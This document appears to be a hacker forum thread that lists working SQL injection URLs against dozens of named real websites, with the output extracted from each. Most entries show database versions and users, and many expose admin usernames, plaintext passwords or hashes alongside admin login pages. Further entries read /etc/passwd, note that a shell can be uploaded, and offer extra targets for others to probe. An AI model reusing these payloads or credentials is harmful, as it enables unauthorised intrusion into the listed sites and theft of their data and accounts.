No, the SQL injection there is not blind. There is output. It is a perfectly ordinary injection: -1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
http://www.wustyle.com/ch/new/article.php?id=-1+union+select+1,2,concat(database(),0x3a,user(),0x3a,version()), 4,5,6,7 wustyle_com:wustyle@localhost:4.1.22-standard
Powered by DzCMS Code: http://www.monvector.mn/index.php?mcmodule=news&newsid=3+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14+limit+1,1/* version():5.0.33 database():mnvector user():root@localhost Code: http://www.monvector.mn/index.php?mcmodule=news&newsid=3+union+select+1,2,3,concat_ws(0x3a,loginname,password),5,6,7,8,9,10,11,12,13,14+from+user+limit+1,1/* admin:dashkaa Code: http://www.monvector.mn/admin/login.php ___ Powered by DzCMS Code: http://www.tuushin.mn/index.php?do=news&newsid=3+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15+from+user+limit+1,1/* version()5.0.33 database():tuushin user():root@localhost Code: http://www.tuushin.mn/index.php?do=news&newsid=3+union+select+1,2,3,4,concat_ws(0x3a,loginname,password),6,7,8,9,10,11,12,13,14,15+from+user+limit+1,1/* admin:dashkaa Code: http://www.tuushin.mn/admin/login.php ___ Powered by DzCMS Code: http://www.uurkhai.mn/index.php?mcmodule=news&newsid=72+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19 version()5.0.75-community-log database():uurkhaim_uurkhai user():uurkhaim_admin@localhost Code: http://www.uurkhai.mn/index.php?mcmodule=news&newsid=72+union+select+1,2,3,4,concat_ws(0x3a,userid,loginname,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user sony:toshiba Code: http://www.uurkhai.mn/admin/login.php ___ Powered by DzCMS Code: http://www.powergym.mn/index.php?mcmodule=news&newsid=588+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12+limit+1,1 version():5.0.75-community-log database():uukhaine_powergym user():uukhaine_undes@localhost Code: http://www.powergym.mn/index.php?mcmodule=news&newsid=588+union+select+1,2,concat_ws(0x3a,loginname,password),4,5,6,7,8,9,10,11,12+from+user+limit+1,1 admin:123456 Code: http://www.powergym.mn/admin/login.php ___ Powered by DzCMS Code: 
http://www.onlinezar.mn/index.php?mcmodule=news&newsid=59+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12+from+user+limit+1,1 version():5.0.75-community-log database():uukhaine_onlinezar user():uukhaine_undes@localhost Code: http://www.onlinezar.mn/index.php?mcmodule=news&newsid=59+union+select+1,2,concat_ws(0x3a,loginname,password),4,5,6,7,8,9,10,11,12+from+user+limit+1,1 admin:mmc Code: http://www.onlinezar.mn/admin/login.php ___ Powered by DzCMS Code: http://www.uils.mn/index.php?info=newsfull&newsid=134+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10+limit+1,1/* version():4.1.20-log database():uilsmn user():[email protected] Code: http://www.uils.mn/index.php?info=newsfull&newsid=134+union+select+1,2,3,concat_ws(0x3a,loginname,password),5,6,7,8,9,10+from+user+limit+1,1/* d.admin:admin Code: http://www.uils.mn/admin/login.php ___ Powered by DzCMS Code: http://www.ecoedu.mn/index.php?mcmodule=news&newsid=850+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12+limit+1,1/* version():4.1.20-max-log database():ecoedu user():[email protected] Code: http://www.ecoedu.mn/index.php?mcmodule=news&newsid=850+union+select+1,2,concat_ws(0x3a,loginname,password),4,5,6,7,8,9,10,11,12+from+user+limit+1,1/* admin:admin Code: http://www.ecoedu.mn/admin/login.php ___ Powered by DzCMS Code: http://www.mon-ensemble.mn/index.php?mcmodule=cat_pages&catcode=7+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user/* version():4.1.20-log database():eiti user():[email protected] Code: http://www.mon-ensemble.mn/index.php?mcmodule=cat_pages&catcode=7+union+select+1,2,3,concat_ws(0x3a,loginname,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+user/* admin:admin Code: http://www.mon-ensemble.mn/admin/login.php ___ Code: http://sflc.num.edu.mn/index.php?newsid=zuwlul&contentid=7+union+select+1,2,concat_ws(0x3a,version(),database(),user())/* 
version()():5.0.45 database():sflc_db user():sflcdbuser@localhost Code: http://sflc.num.edu.mn/index.php?newsid=zuwlul&contentid=7+union+select+1,2,concat(table_name,0x3a,column_name)+from+information_schema.columns/*
<<Free classifieds board>> Code: http://www.board.reporter-studio.ru/idv.php?id=-55886'+union+select+1,2,3,4,5,6,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--+ 5.0.22-=*=-board_-=*=-admin@localhost-=*=-redhat-linux-gnu robots.txt Code: #robots.txt for http://www.board.reporter-studio.ru user-agent: * disallow: /admin/ disallow: /connect.php disallow: /banners.php Host: www.board.reporter-studio.ru tables where: +like+'password'--+ Code: http://www.board.reporter-studio.ru/idv.php?id=-55886'+union+select+1,2,3,4,5,6,table_name,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+information_schema.columns++where+column_name+like+0x70617373776f7264+limit+7,1--+ table: admin db: publications_ log: admin pass: 374982 load_file('/etc/passwd')
SQL injection on http://www.radio-shalom.ca Vulnerable script: http://www.radio-shalom.ca/showemission.php?ID=1015 List of users and their passwords: http://www.radio-shalom.ca/showemission.php?ID=1015+and+0+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,login,pass),11,12,13,14+from+alex_livre_users_en+limit+0,1+--+ Database Version: 5.0.45 Database name: Main User name: [email protected] Datadir: /data/mysqld1/ OS: redhat-linux-gnu
<<BUSINESS-INFO DIRECTORY, KAZAKHSTAN.>> Code: http://www.1kz.biz/index.php?city=&cat=2&id=-20+union+select+1,2,3,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3--+ 5.0.67-community-log-=*=-slvn_1kz-=*=-slvn_1kzbiz83@localhost-=*=-redhat-linux-gnu
www.democracymeansyou.com Code: http://www.democracymeansyou.com/articles/articlepf.php?ID=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- version():4.0.18-standard database():dmy_db1 user():kleinfei@localhost
<<Jobs in Kyiv>> Code: http://www.ukrwork.net/pers_rezume.php?id=-3510+union+select+1,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6-- Code: http://www.ukrwork.net/admin/login.php?accesscheck=%2Fadmin%2Findex.php In the admin panel you can dump and edit all users.... 5.0.51a-=*=-279_ukrworknet-=*=-adminukrwork_279@localhost-=*=-portbld-freebsd7.0 concat_ws(0x3a,login,pazzword) from users +limit+620,1 -=admin=- log: admin pass: qp173y
Code: http://kapelan68.net/k.php?actionn=komentarz&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4 kapelan@localhost:kapelan:5.0.45-Debian_1ubuntu3.3-log 5.0.45-Debian_1ubuntu3.3-log first time I have seen a version like this Code: http://www.musiklexikon.net/komponisten/k.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 musiklexikon@localhost:musiklexikon:5.0.45
Code: http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,version(),database(),user()),3 version():5.0.75-1 database():web22_db1 user():web22_u1@localhost Code: http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,id,login,pass),3+from+moderator 1:Andrey:0025308 2:Tarantul:htlfrnjh
1) Code: http://lisbon.pessoa.free.fr/places.php?id=-67+union+select+1,2,3,4,5-- version():5.0.67 database():lisbon_pessoa user():[email protected] 2) Code: http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,2,3,4-- version():5.1.31 database():ciudadredonda user():ciudadredonda@localhost Code: http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,table_name,3,4+from+information_schema.tables-- Code: http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,concat(0x3a,login,password),3,4+from+members-- admin312PQ/H/U6AVM demodevFxxVFZsuos
Code: http://www.uddannelsesnetvaerket.dk/events.php?mode=view&iEventID=228+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11+limit+1,1/* version():5.0.27 database():uddnet user():uddnet@localhost
http://www.ccls.org/event.php?d=20090412&eventID=-4662+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,version(),78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130-- 4.1.22-standard
Database Version: 4.1.22-max-log Database name: nfcadmin User name: [email protected] Database Version: 5.0.32-Debian_7etch8-log Database name: everydaydish User name: root@localhost FILE_PRIV: Y Login: root Pass: *B747F2732BA6BOC2DD69A76241F18DAF52CA3777 (I may have made a mistake) Admin panel: http://www.everydaydish.tv/admin Database Version: 5.0.51a-community-log Database name: myawol User name: [email protected] Extract from members
Code: http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/* version():5.0.45-log database():Bangkoksurgery user():Bangkoksurgery@localhost Code: http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7+from+phpbb_users/* admin:21232f297a57a5a743894a0e4a801fc3=admin Code: http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat(0x3a,user,0x3a,pass),5,6,7+from+admin_db/* admin:admin
http://www.hockeydb.com PR=6 http://www.hockeydb.com/ihdb/stats/pdisplay.php?pid=-62240+union+Select+user(),2,3,4/* Database Version: 5.0.45-log Database name: slater_slater User name: slater_r@localhost there is a vb.users table, the hashes are all salted!
cargotrend.co.th Google PageRank 3 chttp://www.cargotrend.co.th/webboard/question.php?gid=-115 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,(SELECT CONCAT(username,0x7873716C696E6A64656C,passwd,0x7873716C696E6A64656C,update_date) FROM cargotrend_data.useradmin LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71),6,7,8,9/* bweagle:a9071fbe0379ea38bd6684c48de6e9f4:2009-03-13 17:28:21 bweagle:flyhigh http://www.cargotrend.co.th/admin/login.php The site statistics are a nice touch http://www.cargotrend.co.th/stat/ A shell can be uploaded. As a follow-up, for those who want to poke around: http://www.greenlandcity.com/webboard/question.php?gid=-107+union+select+1,2,3,4,5,version(),7,8-- PR 1 http://www.job2way.com/webboard/question.php?gid=-394+union+select+1,2,3,4,version(),6,7-- PR 3 http://www.ningfashion.com/webboard/question.php?gid=-214+union+select+1,2,3,4,5,version(),7,8-- PR 1 4.1.22-standard everywhere
Hoster IVR,Voice,Broadcasting,Phone,Numbers,Call Routing | Ifbyphone 5th branch user() = [email protected] Novo-Kuryinskaya water Code: voda:[email protected]:5.0.41-log Code: admin:5d436cf40fad3f2e admin panel http://voda.ur.ru/admin.php Network for cellulite treatment and body wellness 5th branch Code: user() = proinfo@localhost database() = proinfo_cellulait
6koles.ru TIC: 450 HTML: http://6koles.ru/shini_search_result.php?mode=size&season=0&width=30&height=1&radius=13&company=6+UnIoN+select+concat_ws(0x3A,user(),version(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+&class14=on user6koles1@localhost:5.0.24-standard:db_user6koles1
let's keep breaking tires TIC: 400 PR: 4 http://www.koleso.ru/index.php?pageId=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6, 7/* koleso@localhost:5.0.45-log:koleso